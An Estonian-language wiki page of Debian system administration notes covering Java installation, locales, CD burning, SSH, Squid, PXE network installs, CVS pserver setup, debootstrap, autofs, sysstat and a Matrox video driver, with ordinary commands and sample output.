p kaffe-pthreads - A POSIX threads enabled version of the Kaffe VM
p sun-java5-jdk - Sun Java(TM) Development Kit (JDK) 5.0
p sun-java6-jdk - Sun Java(TM) Development Kit (JDK) 6

Tarkvara paigaldatakse nagu ikka Debiani pakett ning kasutatakse nagu ikka Javat.

====Sun Java kasutamine====

Sun on Java autor ja üks oluline edasiarendaja, kuid on ka teisi Java implementatsioone. Sun Java saab kasutaja kopeerida aadressilt http://java.sun.com/ kus saab tutvuda ka Java kasutustingimustega.

Sun jagab Javat üsna erinevates pakendustes, kusjuures erinevus on kolmel nö teljel

* millisele funktsionaalsusele on orieteeritud - SE (Standard Edition), EE (Enterprise Edition), ME (Micro Edition)
* kas tegu on arendusvahendi või nö kasutusvahendiga - nt SDK (Software development kit) vs JRE (Java Runtime Environment), viimane sisaldub esimeses
* versiooninumber

Erinevad versioonid 2009 suve seisuga

* 1.3 - vana versioon, mida kasutavad ehk vaid mõned nö riistvaras javat sisaldavad seadmed
* 1.4 - mõned nö legacy rakendustega Tomcat rakendusserverid võiksid seda veel kasutada
* 5 (vahel nimetatakse 1.5) - täiesti veel kasutuses, mõnda rakendust soovitatakse kasutada sellel versioonil
* 6 (vahel nimetatakse 1.6) - viimane stabiilne versioon

Tundub, et juhtumil kui ei ole teada millist Javat kasutada, siis on sobiv valida SE SDK versioon 1.6, mille saab kopeerida http://java.sun.com/ veebikohast liikudes

Downloads -> Java SE -> Java SE Development Kit (JDK 6 Update 16) -> Download

ning täpsustada platvorm, nt

* Linux64 - 64 bit Linux
* Linux - 32 bit Linux

Seejärel valida nimekirjast .bin

File Description Name Size
Java SE Development Kit 6u16 jdk-6u16-linux-x64-rpm.bin 74.04 MB
Java SE Development Kit 6u16 jdk-6u16-linux-x64.bin 78.08 MB

Kasutamiseks tuleb otsustada, millises kataloogis JVM asuma hakkab, olgu see nt /usr/local/java6, selleks tuleb minna juurkasutajana kataloogi /usr/local

# cd /usr/local
# sh jdk-6u16-linux-x64.bin
vastata küsimustele jaatavalt
# ln -s /usr/local/tekkinud-katalooginimi /usr/local/java6

Java kasutamiseks tuleb seada ja kui peetakse vajalikuks, lisada teele

$ export JAVA_HOME=/usr/local/java6
$ export PATH=/usr/local/java6/bin:$PATH

Seejärel saab nt küsida Java versiooni öeldes

$ /usr/local/java6/bin/java -version
java version "1.6.0_16"
Java(TM) SE Runtime Environment (build 1.6.0_16-b01)
Java HotSpot(TM) 64-Bit Server VM (build 11.3-b02, mixed mode)

====Iceweaseli Java lisa====

Iceweaseli ehk Firefox 3.x versiooniga java kasutamiseks on i386 keskkonnas olemas plugin

# apt-get install sun-java5-plugin

või

# apt-get install sun-java6-plugin

===Lokaat===

Lokaatide kasutamiseks tuleb paigalda pakett locales

# apt-get install locales

ning edasiseks seadistamiseks saab öelda, asjakohased seadistusfailid on iseenesest /etc/environment ning /etc/default/locale

# dpkg-reconfigure locales

Süsteemi vaikelokaat võiks olla ehk C serverite puhul, aga see on kasutaja otsustada kuidas ta paremaks peab.

Lokaatide nimekirja esitamiseks tuleb öelda, nt selline võiks olla üsna tüüpiline tulemus

# locale -a
C
POSIX
et_EE.utf8

Kui seadistada lisaks nt ru_RU.utf8 ja fr_FR.utf8, siis saab lugeda vene ja prantsuse keelseid manuaale. Nt öeldes nö tavalises xtermis

$ export LANG=fr_FR.utf8
$ uxterm

mis paistab selline

[[Pilt:Os-debian-kasutamine-1.gif]]

Lisaks töötab nt w3m ja lynx uxterm aknas vene keeles.

===CD plaadi kirjutamine===

Niisama plaadile kirjutamiseks tuleb esmalt moodustada failidest tõmmis öeldes näiteks

# genisoimage -o ../tommis.iso .

ning seejärel kopeerida tõmmis plaadile öeldes

# cdrecord -v speed=10 dev=/dev/cdrom tommis.iso

Kui tegu on RW plaadiga, siis ennem järgmist kirjutamist tuleb plaat puhastada käsuga

# cdrecord -v dev=/dev/cdrom blank=fast

Squeeze puhul

# apt-get install wodim
# wodim -v speed=8 dev=/dev/sr0 tommis.iso

korduvkirjutatava plaadi kustutamiseks

# wodim -v dev=/dev/cdrom blank=fast

===Klaviatuuriasetus konsoolil===

Klaviatuuriasetuse muutmiseks tuleb öelda

# dpkg-reconfigure console-data

ning valida sobiv asetus. NB! Ka mac'i asetus on olemas.

===OpenSSL probleem===

2008 aasta kevadel ilmnes, et Debiani arendajad olid OpenSSL tarkvara pakendamisel tekitanud avalike võtmete genereerimist puudutavas osas vea, mille tõttu osa varasemalt Debian Etch abil tekitatud võtmeid ja sertifikaate on ärakasutatavad. Kas konkreetne sertifikaat on haavatav saab kontrollida programmiga openssl-vulnkey. Esmalt tuleb paigaldada Backportsidest pakett openssl-blacklist ning öelda

# cat sertifikaat.pem | openssl-vulnkey -
COMPROMISED: b3409bf40c63d0d8fc3e1625e9cac2076e20d1e7 -

===Helikaardi kastumine===

Kui helikaart on arvutisse füüsiliselt paigaldatud, siis vajadusel saab SoX tarkvara utiliitide abil kontrollida, kas heli salvestamine mikrofoni abil ja heli taasesitamine töötavad.

Sox tarkvara paigaldamiseks tuleb öelda

# apt-get install sox

Salvestamiseks sobib öelda

# rec -t .wav /tmp/failinimi.wav

Taasesitamiseks sobib öelda

# play /tmp/failinimi.wav

Lisaks on asjakohane kasutada mikserit, nt aumix või alsamixer, just mikrofoni sisselülitamiseks, käivitades xtermi aknas võiks paista selline pilt, vajadusel käivitamisel näidata seadme number, nt

# alsamixer -c 1

[[Pilt:Alsamixer-1.gif]]

kus

* F6 abil saab valida helikaarti, sh virtuaalset (PulseAudio)

===Digifotokaamera kasutamine===

Tänapäeval on levinud nn digitaalsed fotokaamerad, mida saab ühendada arvutiga USB liidese abil selleks, et kopeerida arvutisse fotoaparaadi flash diskile salvestatud pildid. Üks populaarne tarkvara, mis võimaldab suhelda fotokaameraga on gphoto2 http://gphoto.sourceforge.net/.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install gphoto2

Graafiline nö pealisehitus gphoto2 tarkvarale on gtkam, mille paigaldamiseks tuleb öelda

# apt-get install gtkam

Piltide kopeerimiseks tuleb kaamera ühendada arvutiga ning lülitada piltide kopeerimise režiimile, operatsioonisüsteem peaks seejärel USB seadme ära tundma

# lsusb
...
Bus 001 Device 006: ID 04a9:309a Canon, Inc. PowerShot A80
Bus 001 Device 001: ID 0000:0000

Peale gtkam programmi käivitamist peaks gtkam suutma avastada kaamera ning esitama sarnase kasutajaliidese

[[Pilt:Gtkam-1.gif]]

gphoto2 programmi abil saab kaamerat otsekohesemalt juhtida, aga eeldusel, et gtkam või mõni muu programm seda ei kasuta. Nt saab küsida kaamera kohta kokkuvõtet öeldes

# gphoto2 --summary
Camera summary:
Model: Canon PowerShot A80
device version: 01.0001
serial number: (null)
Vendor extension ID: 0x0000000b
Vendor extension description: (null)
...

või kopeerida kõik failid kaamerast failisüsteemi käesolevasse kataloogi

# gphoto2 --get-all-files
Downloading 'IMG_3601.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3601.JPG
Downloading 'IMG_3602.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3602.JPG
..

Android telefonist vms seadmest kopeerimisel on praktiline näidata kataloog, nt Google Nexus 5 nutitelefon puhul

$ gphoto2 --get-all-files -f /store_00010001/DCIM/Camera

Sony Xperia tahvelarvutiga

$ gphoto2 --get-all-files -f /store_00010001/DCIM/100ANDRO

Kui seadme ühendamise ta nö mountitakse, siis võib olla vajalik ta File Manager programmis vms kohal lahti lasta.

===SSH kasutamine===

Kui Debian on juhtumisi paigaldatud Networkless siis puudub vaikimisi openssh-server, selle paigaldamiseks tuleb öelda käsk

# apt-get install openssh-server

Mille järel starditakse server ka automaatselt, kasutaja mureks on vaid sisse logida.

Kui Debian Lenny ssh kliendiga sisselogimine teistesse süsteemidesse on muutunud rahulikuks (nt vana RedHat 4 ES või Solaris 10 ssh serverid oma default väärtustega) ning -v võtmega käivitatud klient ütleb muu seas

debug1: Authentications that can continue: gssapi-keyex,\
gssapi-with-mic,publickey,password,keyboard-interactive
debug1: Next authentication method: gssapi-keyex
debug1: No valid Key exchange context
debug1: Next authentication method: gssapi-with-mic
debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

siis aitab kliendi seadistusfailis, nt /etc/ssh/ssh_config kasutada selliselt seadistatud parameetrit

GSSAPIAuthentication no

===Veebikaamera kasutamine===

Veebikaamera on väike videokaamera, mis tavaliselt ühendatakse arvutiga USB abil ning teda sobib kasutada nt Skype programmi juures enda visuaalseks reaalajas esitlemiseks.

Veebikaamera kasutamise ettevalmistamisel peab peale kaamera arvutiga ühendamist ilmuma USB seadmete nimekirja uus seade, midagi sellist

# lsusb
..
Bus 001 Device 003: ID 046d:092e Logitech, Inc. QuickCam Chat

Selle spca5xx chipsetiga Logitechi QuickCam Chat veebikaamera kasutamiseks tuleb paigaldada Lennile vastav draiver valides sobiva, st oma tuuma platvormile sobiva tuumamooduli, nt

# apt-get install gspca-modules-2.6-686

Lisaks peab see kasutaja, kelle alt Skype programm töötab kuuluma video gruppi, vajadusel tuleb redigeeerida /etc/group faili

# grep video /etc/group
video:x:44:kasutajanimi

Kui kasutaja määrati gruppi kuuluma, siis tuleb korraks süsteemist logida välja ja tagasi sisse, et gruppikuuluvus kehtestuks. Valides seejärel Skype programmi Options peaks olema kaamera kasutamise võimalus olemas

[[Pilt:Veebikaamera-1.gif]]

Veebikaamerat oskavad kasutada lisaks mitmed muud programmid, nt Cheese (gnome komponent), Gqcam.

===Mälukaartide kasutamine===

Nn mälukäärte esineb külluses, need mis ühendatakse arvutile külge USB liidese kaudu, kas otse või nö lugeja abil paistavad operatsioonisüsteemile tavaliselt SCSI seadmena. Seega, kasutamiseks tavaliselt piisab teha kindlaks dmesg väljundi lõpust millise nimega /dev/sdx seade on juurde tekkinud ning monteerida seejärel ta külge, nt

# mount /dev/sdc1 /mnt/malukaart

===Squid v. 3 kasutamine===

Lenny paketihaldusest saab paigaldada Squid v. 3 tarkvara öeldes

# apt-get install squid3

====Kasutamine kiirendina====

Squid3 kiirendina kasutamiseks sobib kasutada sellist seadistusfaili

cache_dir ufs /var/spool/squid3 768 16 256
http_port 10.0.6.249:80 defaultsite=www.siseministeerium.ee vhost
icp_port 0

cache_peer 10.0.6.95 parent 80 0 no-query originserver name=www100695 login=PASS
acl sites_www_100695 dstdomain src "/etc/squid3/sites_www100695.txt"
cache_peer_access www100695 allow sites_www_100695

cache_peer 10.0.6.96 parent 80 0 no-query originserver name=www100696 login=PASS
acl sites_www_100696 dstdomain src "/etc/squid3/sites_www100696.txt"
cache_peer_access www100696 allow sites_www_100696

acl all src 0.0.0.0/0.0.0.0
acl localhost src 127.0.0.1/255.255.255.255 10.0.0.0/255.255.255.0
acl Safe_ports port 80 # http

http_access deny !Safe_ports
http_access allow all

access_log /var/log/squid3/access.log squid
emulate_httpd_log on

===locate andmebaas===

Vaikimisi moodustab Debian updatedb programmi käivitamisel cron'ist nn locate andmebaasi, milles sisaduvad süsteemis leiduvate failid nimed. Seda andmebaasi saab kasutada nt selliselt

# locate .bash_history
/root/.bash_history
/srv/backup/500g-vint/home/mart/.bash_history

locate andmebaas võib osutuda mitmel juhul ebasoovitavaks

* andmebaasi salvestatakse andmed, mis seal ei peaks sisalduma; nt kui veebiserveri kasutajana saab käivitada programme, siis annab see baas ilmselt soovimatut lisainfot kasutajale ühe või teise faili olemasolust ja asukohast failisüsteemis
* locale andmebaasi moodustatakse väga suure mahuga andmetest iga päev uuesti ning see raiskab ilmselt ressurssi

updatedb programm käivitatakse skripti

/etc/cron.daily/mlocate

abil ning updatedb tööd saab kontrollida seadistusfaili abil, eriti, milliseid katalooge andmebaasi koostamisel kasutatakse

/etc/updatedb.conf

===Operatsioonisüsteemi paigaldamine võrgust===

Operatsioonisüsteemi võrgust paigaldamine eeldab arusaadavalt paigaldamise ajal võrguühenduse olemasolu, soovitavalt nö hea ühenduse olemasolu. Debian Lenny operatsioonisüsteemi saab paigaldada võrgust kolmel viisil

* business card CD tõmmis (ca 40 MB) - sisaldab tuuma ja installerit
* minimaalse sisu CD tõmmis (ca 180 MB) - sisaldab tuuma, installerit ning minimaalset hulka pakette
* TFTP serverilt paigaldamine - tuuma ja ramdisk booditakse TFTP serverilt

Vaatamata sellele kui palju kasutati kohalikku abi, st lokaalset meediat või TFTP serverit toimub süsteemi mahukama osa moodustava tarkvara kopeerimine paigaldamise ajal võrgust.

Võrgust paigaldamine võiks eriti sobida üle IBM IMM ja HP iLO liideste tarvkara paigaldamisel.

====Paigaldamine TFTP serverilt====

Üks võimalus Debiani paigaldada on täiesti ilma lokaalse meediate st võrgust, kuid eeldusel, et arvuti omab PXE võimelist võrgukaarti.

Selleks tuleb kopeerida aadressilt tftp serveris kasutamiseks ettevalmistatud kataloogi sisu

# wget -np -r http://ftp.nl.debian.org/debian/dists/lenny/main/installer-i386/current/images/netboot/debian-installer/i386/

ning paigutada lokaalvõrgus asuvasse tftp serverisse, nt kataloogi /tftpbood

# find /tftpboot
/tftpboot
/tftpboot/debian-installer
/tftpboot/debian-installer/i386
/tftpboot/debian-installer/i386/boot-screens
/tftpboot/debian-installer/i386/boot-screens/exithelp.cfg
/tftpboot/debian-installer/i386/boot-screens/adtxt.cfg
/tftpboot/debian-installer/i386/boot-screens/index.html
/tftpboot/debian-installer/i386/boot-screens/f1.txt
/tftpboot/debian-installer/i386/boot-screens/f10.txt
/tftpboot/debian-installer/i386/boot-screens/f2.txt
/tftpboot/debian-installer/i386/boot-screens/f3.txt
/tftpboot/debian-installer/i386/boot-screens/f4.txt
/tftpboot/debian-installer/i386/boot-screens/f5.txt
/tftpboot/debian-installer/i386/boot-screens/f6.txt
/tftpboot/debian-installer/i386/boot-screens/f7.txt
/tftpboot/debian-installer/i386/boot-screens/f8.txt
/tftpboot/debian-installer/i386/boot-screens/f9.txt
/tftpboot/debian-installer/i386/boot-screens/syslinux.cfg
/tftpboot/debian-installer/i386/boot-screens/menu.cfg
/tftpboot/debian-installer/i386/boot-screens/prompt.cfg
/tftpboot/debian-installer/i386/boot-screens/splash.png
/tftpboot/debian-installer/i386/boot-screens/stdmenu.cfg
/tftpboot/debian-installer/i386/boot-screens/vesamenu.c32
/tftpboot/debian-installer/i386/boot-screens/txt.cfg
/tftpboot/debian-installer/i386/index.html
/tftpboot/debian-installer/i386/initrd.gz
/tftpboot/debian-installer/i386/linux
/tftpboot/pxelinux.0
/tftpboot/pxelinux.cfg
/tftpboot/pxelinux.cfg/index.html
/tftpboot/pxelinux.cfg/default

Lisaks tuleb valmistada ette sobivalt dchp server, nt sellise host kirjeldusega, next-server 192.168.1.254 on tftpd server

host fuji.auul {
hardware ethernet 00:17:42:02:0b:8a;
fixed-address 192.168.1.142;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
filename "pxelinux.0";
next-server 192.168.1.254;
option domain-name-servers 192.168.1.254;
}

Tulemusena peab installeeritav arvuti saama dhcp serverilt omale võrguseaded, alglaadima tftp serverilt operatsioonisüsteemi ning käivitama installeri. Edasine paigaldamine toimub tavapärasel viisil, kusjuures installer küsib Debiani peegel-serveri asukohta, millelt kopeeritakse tarkvara.

===CVS tarkvara kasutamine===

CVS tarkvara saab kasutada mitmel moel, antud juhul on tegemist selliste asjaoludega

* CVS töötab nn pserver rezhiimis, mis tähendab, et teenus kuulab 2401 pordil ja liiklus on krüptimata
* CVS liiklust tuleb täiendavate CVS väliste vahenditega turvata, nt OpenVPN või Stunnel
* CVS tarkvara tegeleb ise oma kasutajatega, st operatsioonisüsteemi kasutajatest eraldi
* saab kasutada mitmeid hoidlaid (ingl. k. repository)
* failisüsteemi kasutamine hoidla operatsioonisüsteemi seisukohalt toimub iga hoidla puhul hoidlale vastava kasutajaga (mitte hoidlat kasutava cvs kasutajana)

Antud juhul kasutatakse mitmeid Debiani haldajate poolt nn vanilla CVS tarkvarale juurde lisatud täiendusi, mille kasutamist on kirjeldatud failis /usr/share/doc/cvs/README.Debian.gz.

Paigaldamiseks tuleb öelda

# apt-get install cvs

ning valida kas kasutatakse pserverit või mitte, antud juhul kasutatakse ja seejuures tuleb järgnevalt määrata, millistes kataloogides asuvad repositooriumid, nt

/srv/cvs-loomaaed
/srv/cvs-propaganda

CVS tarkvara juhivad serveri poolel sellised seadistusfaili

* CVS p-serveri seadistusfailis /etc/cvs-pserver.conf sisalduvad muu seas repositooriumide asukohad failisüsteemis ning kasutate paroolifail

CVS_PSERV_REPOS="/data/cvs-loomaaed:/data/cvs-propaganda"
CVS_PSERV_LIMIT_MEM=hard
CVS_PSERV_LIMIT_DATA=hard
CVS_PSERV_LIMIT_CORE=0
CVS_PSERV_LIMIT_CPU=hard
CVS_EXT_PASSWD_FILE=/etc/cvs-passwd

* inetd või xinetd kasutamisel vastavalt seadistusfailis /etc/inetd.conf peab sisalduma rida

cvspserver stream tcp nowait root /usr/sbin/tcpd /usr/sbin/cvs-pserver

või fail /etc/xinetd.d/cvs sisuga

service cvspserver
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/cvs-pserver
}

* repostitooriumide failide omanikud ja efektiivsed kasutajad failis on kirjeldatud /etc/cvs-repouids

/srv/cvs-loomaaed:cvs-loomaaed
/srv/cvs-propaganda:cvs-propaganda

Repositooriumide initsialiseerimiseks tuleb öelda

# su - cvs-loomaaed
$ cvs -d /srv/cvs-loomaaed init
# su - cvs-propaganda
$ cvs -d /srv/cvs-propaganda init

Paroolifaili /etc/cvs-passwd formaat on selline

/data/cvs-loomaaed
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.
/data/cvs-propaganda
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.

Projektid tuleb alguses hoidlasse importida vastavate kasutajatega

# su - cvs-loomaaed
$ cd /data/tmp/portaal-arendus
cvs-loomaaed$ cvs -d /data/cvs-loomaaed import -m "Loomaaia portaali arendus algab" portaal-arendus vt rt
# su - cvs-propaganada
$ cd /data/tmp/portaal-propaganda
cvs-propaganda$ cvs -d /data/cvs-propaganda import -m "Loomaaia propaganda algab" propaganada vt rt

====Moodulite kirjeldamine====

CVS all olevast projektist saab kopeerida ka üksikuid katalooge öeldes

$ cvs co projektinimi/katalooginimi

====Kasutamine Linuxi CVS kliendiga====

$ export CVSROOT=:pserver:kasutajanimi@cvs.loomaaed.tartu.ee:/data/cvs-loomaaed
$ cvs login
$ cvs co portaal-arendus
$ cvs logout

====Kasutamine Windowsi TortoiseCVS kliendiga====

[[Pilt:Tortoisecvs-1.gif]]

===Riistvara omadustega tegelevad utiliidid===

* lshw - esitab suhteliselt põhjaliku väljundi arvutisüsteemi riistvaralistest komponentidest, nt sellise

# apt-get install lshw

* ethtool

# apt-get install ethtool

===Debootstrap programmi kasutamine===

debootstrap programmiga saab näidatud kataloogi moodustada operatsioonisteemi juurfailisüsteemi

# debootstrap lenny /srv/lenny-chroot http://ftp.aso.ee/debian

Nt sobib seda kasutada töötava operatsioonisüsteemi sees olles multiboot arvuti moodustamiseks. Sel juhul tuleb Debian Lenny puhul lisaks tähele panna selliseid asjaolusid peale seda kui debootstrap on töö lõpetanud

* moodustada /etc/fstab sisu
* seadistada /etc/network/interfaces ja /etc/hosts
* kopeerida /lib/modules alla tuuma moodulid
* paigaldada udev, lvm2, vlan, firmware-bnx2, bridge-utils ja openssh-server tarkvara (ja muu oluline)
* kirjutada /etc/shadow faili juurkasutajale parool (konsoolilt saab küll login: root järel enterit öeldes sisse ka ilma paroolita)
* kopeerida tuum ja iniramfs /boot kataloogi
* paigaldada alglaadur (nt grub-install abil)
* seadistada ajavöönd, /etc/localtime link

Kui selliselt moodustatud keskkonda chrootida, siis üldiselt peaks olema eelnevalt ühendatud külge sellised failisüsteemid, eeldusel, et keskkond asub kataloogis /target

/dev/sda1 on /target/boot type ext3 (rw,noatime,errors=continue,data=ordered)
proc on /target/proc type proc (rw)
sysfs on /target/sys type sysfs (rw)
udev on /target/dev type tmpfs (rw,size=10240k,mode=755)
devpts on /target/dev/pts type devpts (rw,mode=600)

öeldes

# mount -t proc /proc /srv/lenny-32/proc
# mount -t devpts devpts /srv/lenny-32/dev/pts

debootstrap abil saab tekitada ka teisele arhitektuurile vastav failisüsteem, nt öeldes amd64 keskkonnas

# debootstrap --arch=i386 lenny /srv/lenny-32 http://ftp.aso.ee/debian

Uuemal ajal soovitatakse kasutada tarkvara multistrap.

===Autofs===

Selleks, et failisüsteem monteeritaks külge automaatselt vastava ühenduspunkti poole pöördumisel, sobib kasutada tarkvara autofs. Tarkvara paigaldamiseks tuleb öelda

# apt-get install autofs

Tarkvara kasutamiseks tuleb näidata seadistusfailis /etc/auto.master nn map failide asukohad, nt

# cat /etc/auto.master
/var/autofs /etc/auto.misc --timeout=60

kusjuures map failis /etc/auto.misc on kirjeldatud konkreetsed ressursid, nt

# cat /etc/auto.misc
cd -fstype=iso9660,ro,nosuid,nodev :/dev/cdrom
removable -fstype=ext3,ro :/dev/mapper/mpath3

Kui nüüd öelda muidu tühjas kataloogis /var/autofs 'ls -l', siis ühendatakse failisüsteem külge ning seejärel täidetakse ls käsk, nt

# cd /var/autofs/removable
drwx------ 2 root root 16384 Apr 11 14:13 lost+found

Ühendatud failisüsteemide parameetreid näeb nii

# mount | grep autofs
automount(pid7544) on /var/autofs type autofs (rw,fd=4,pgrp=7544,minproto=2,maxproto=4)
/dev/mapper/mpath3 on /var/autofs/removable type ext3 (ro)

Autofs olekut näeb öeldes

# /etc/init.d/autofs status
Configured Mount Points:
------------------------
/usr/sbin/automount --timeout=300 /home file /etc/auto.home

Active Mount Points:
--------------------
/usr/sbin/automount --pid-file=/var/run/autofs/_home.pid --timeout=300 /home file /etc/auto.home

====NFS ressursi ühendamine====

Nt kasutajate kodukataloogide üle NFS ühendamiseks tuleb kirjeldada nt selline /etc/auto.home fail

# cat /etc/auto.home
kernel -ro,soft,intr 192.168.10.249:/data/export

===Süsteemi ressursikasutuse jälgimine===

Pakett sysstat http://pagesperso-orange.fr/sebastien.godard/ sisaldab süsteemi ressurssikasutuse jälgimiseks vajalikke vahendeid, nii reaalajas kui taustal andmete kogumiseks

* reaalajas - iostat, pidstat, mpstat
* taustal - sa1, sa2, sar

Tarkvara käivitamist ja töötamist juhivad seadistusfailid

/etc/cron.d/sysstat
/etc/cron.daily/sysstat
/etc/default/sysstat

Taustal töötava sysstat töö tulemusena kogutakse andmed ja salvestatakse binaarses formaadis kataloogi /var/log/sysstat. Kogutud andmeid saab esitada nt selliselt

# sar -A -f /var/log/sysstat/sa22 | less

Eraldi mainimist vajab programm pidstat, mille abil saab jälgida üksiku protsessiga seotud ressursikasutust, nt plokkseadme IO'd

$ pidstat -d -p 15585 2
Linux 2.6.26-1-xen-amd64 (moraal.auul) 04/22/09 _x86_64_

20:13:28 PID kB_rd/s kB_wr/s kB_ccwr/s Command
20:13:30 15585 0.00 236.82 0.00 wget
20:13:32 15585 0.00 238.00 0.00 wget
20:13:34 15585 0.00 236.82 0.00 wget
20:13:36 15585 0.00 238.00 0.00 wget

Kõigi kasutaja postgres protsesside io'd saab uurida nt selliselt

$ pidstat -d -p ALL 2 | grep postgres

===Matrox P690 videokaardi kasutamine===

Matrox http://www.matrox.com/ valmistab suhteliselt eeskujulikke videokaarte. P690 mudeli kasutamiseks sobib kasutada aadressil http://www.matrox.com/graphics/en/products/graphics_cards/p_series/p690pci/ kopeeritud draiverit. Lisaks asub nö community-forum aadressil http://forum.tuxx-home.at/ ning sealsed entusiastid avaldavad oma parandustega draivereid.

====Paigaldamine====

# CC=/usr/bin/gcc-4.1 sh mtxdriver-installer-x86_32-cvs-20090511.run
..
Please, enter the directory to extract the files [/root/] /usr/src/mtx
Creating directory /usr/src/mtx/matroxdriver-x86_32-cvs-20090511
Verifying archive integrity... All good.
Uncompressing Matrox Parhelia Driver.
..
========================================
Matrox Linux Driver Install Script
========================================

Installation package v1.4.7

Refreshing ld database
Installing mtx_drv.so ...
Installing v4l_drv.so ...
Messages are being logged in file /tmp/make.log,
this might take some time.

Compiling mtx.ko ... done

Installing mtx.ko ...
Backing up libGL
Installing 32bits OpenGL library file to /usr/lib
Installing libGL.so.1.3.0 ...
Installing the GLX library file to /usr/lib/xorg/modules/extensions

Installing libglx.so ...
Installing the gl.h header file to /usr/include/GL

Installing gl.h ...
Installing the glext.h header file to /usr/include/GL

Installing glext.h ...
Installing the glx.h header file to /usr/include/GL

Installing glx.h ...
Updating library cache

Installing documentation

cp: cannot stat `v4l': No such file or directory
Installing powerdesk

Installing mtxcards ...
Installing mtxwizard ...
Installing matroxconfig ...
Installing libmtxcfg.so ...

Do you wish to let the installer setup your X config file (y/n)? y

Trying to configure your X config file (/etc/X11/xorg.conf)

Installation finished

Tulemusena on

* moodustatud nö vaikimisi /etc/X11/xorg.conf seadistusfail
* seadistusutiliit /usr/bin/matroxconfig
* kataloogi /usr/share/matrox on paigutatud teeke ja tekste
* kompileeritud ja paigaldatud tuuma moodul mtx.ko, mis on link /usr/share/matrox kataloogi failile

# find /lib/modules/2.6.26-2-686 -name mtx.ko -ls
721274 0 lrwxrwxrwx 1 root root 32 Aug 8 17:44 \
/lib/modules/2.6.26-2-686/kernel/drivers/video/mtx.ko -> /usr/share/matrox/current/mtx.ko

Süsteemi on lisatud/asendatud sellised failid

/usr/bin
/usr/bin/mtxwizard
/usr/bin/matroxconfig
/usr/share
/usr/share/mtxwizard
/usr/share/mtxwizard/mtxcards
/usr/share/matrox
/usr/share/matrox/samples
/usr/share/matrox/samples/XF86Config.QID_Quad_Hybrid
/usr/share/matrox/samples/XF86Config.QID_Quad_Merge
/usr/share/matrox/samples/XF86Config.triple
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_1
/usr/share/matrox/samples/XF86Config.T221-Merged
/usr/share/matrox/samples/XF86Config.merged
/usr/share/matrox/samples/XF86Config.dual
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_2
/usr/share/matrox/samples/XF86Config.single
/usr/share/matrox/samples/XF86Config.triple_merged
/usr/share/matrox/samples/XF86Config.T221-Xinerama
/usr/share/matrox/current
/usr/share/matrox/current/gl.h
/usr/share/matrox/current/libmtxcfg.so
/usr/share/matrox/current/mtxcards
/usr/share/matrox/current/mtx_drv.so
/usr/share/matrox/current/glx.h
/usr/share/matrox/current/glext.h
/usr/share/matrox/current/mtx.ko
/usr/share/matrox/current/v4l_drv.so
/usr/share/matrox/current/mtxwizard
/usr/share/matrox/current/libGL.so.1.3.0
/usr/share/matrox/current/matroxconfig
/usr/share/matrox/current/libglx.so
/usr/share/matrox/backup
/usr/share/matrox/docs
/usr/share/matrox/docs/readme.txt
/usr/share/matrox/docs/readme-advanced.txt
/usr/lib
/usr/lib/libGL.so.1.3.0
/usr/lib/libGL.so
/usr/lib/xorg/modules/extensions
/usr/lib/xorg/modules/extensions/libmtxcfg.so
/usr/lib/xorg/modules/extensions/libglx.so
/usr/lib/xorg/modules/drivers
/usr/lib/xorg/modules/drivers/mtx_drv.so
/usr/lib/xorg/modules/drivers/v4l_drv.so
/usr/lib/libGL.so.1
/usr/src/mtx
/usr/src/mtx/log
/usr/include/GL
/usr/include/GL/gl.h
/usr/include/GL/glx.h
/usr/include/GL/glext.h

Tuuma laadimisel öeldakse

# modprobe mtx
mtx: module license 'Copyright (c) 2002, 2004, Matrox Graphics Inc.' taints kernel.
[mtx] MTX driver v1.4.7
[mtx] Allocated a MTX agp driver structure
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 21 (level, low) -> IRQ 21
[mtx] 0x2539(sub:0xffffffff) board found at 03:00.0

====Seadistamine====

Komplekt sisaldab ka graafilist haldusutiliiti matroxconfig, mille abil saab genereerida sobiva X serveri seadistusfaili /etc/X11/xorg.conf, nt sellise [[Pilt:Xorg.conf.patch]]

[[Pilt:Matroxconfig-1.gif]]

Käivitamisel öeldakse dmesg'i

[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass
[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass

X log võiks olla nt selline http://kuutorvaja.eenet.ee/mw-1.9.3/images/e/e1/Xorg.mtx-p690.patch

Kui töökohaarvuti vahetada säilitades videokaardi ja monitorid, siis tõenäoliselt piisab xorg.conf failis asendada seadme sektsioonides PCI BusID väärtus sobivaga

Section "Device"
# generated by mtx wizard
Identifier "mtxwizard_device_1"
Driver "mtx"
BusID "PCI:3:0:0"
Screen 1
EndSection

kusjuures õige saab teha kindlaks lspci utiliidiga

# lspci | grep Matrox
03:00.0 VGA compatible controller: Matrox Graphics, Inc. Millennium P690 (rev 01)

===lsattr ja chattr programmide kasutamine===

chattr programmi abil saab ext2 ja ext3 failisüsteemis seadistada failidele täiendavad omadusi. Näiteks, märkida faili immutable'ks

# chattr +i failinimi

Tulemusena ei saa seda faili ka kustutada juurkasutaja

# rm failinimi
rm: cannot remove `failinimi': Operation not permitted

Atribuutide väärtusi saab küsida öeldes

# lsattr failinimi
----i-------------- failinimi

